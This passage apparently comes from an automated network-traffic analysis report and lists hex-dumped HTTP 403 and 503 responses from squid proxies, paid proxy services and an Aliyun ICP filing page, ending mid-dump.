6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:53 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableAccess-Control-Allow-Credentials: trueAccess-Control-Allow-Headers: Content-Type,AccessToken,X-CSRF-Token, Authorization, TokenAccess-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE,UPDATEAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length, Access-Control-Allow-Origin, Access-Control-Allow-Headers, Content-TypeContent-Type: text/plain; charset=utf-8Set-Cookie: uuid=a28a73df-de0e-11ee-9749-fa20201ff994; Path=/; Max-Age=8640000; HttpOnlyX-Content-Type-Options: nosniffDate: Sat, 09 Mar 2024 12:14:53 GMTContent-Length: 31Data Raw: 75 6e 73 75 70 70 6f 72 74 65 64 20 70 72 6f 74 6f 63 6f 6c 20 73 63 68 65 6d 65 20 22 22 0a Data Ascii: unsupported protocol scheme ""
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:53 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:54 GMTServer: ApacheContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:54 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:54 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:54 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:54 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:54 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: closeData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.20Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:54 GMTContent-Type: text/html;charset=utf-8Content-Length: 3661X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from ezproxies.comX-Cache-Lookup: NONE from ezproxies.com:58378Via: 1.1 ezproxies.com (squid/3.5.20)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:54 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:54 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 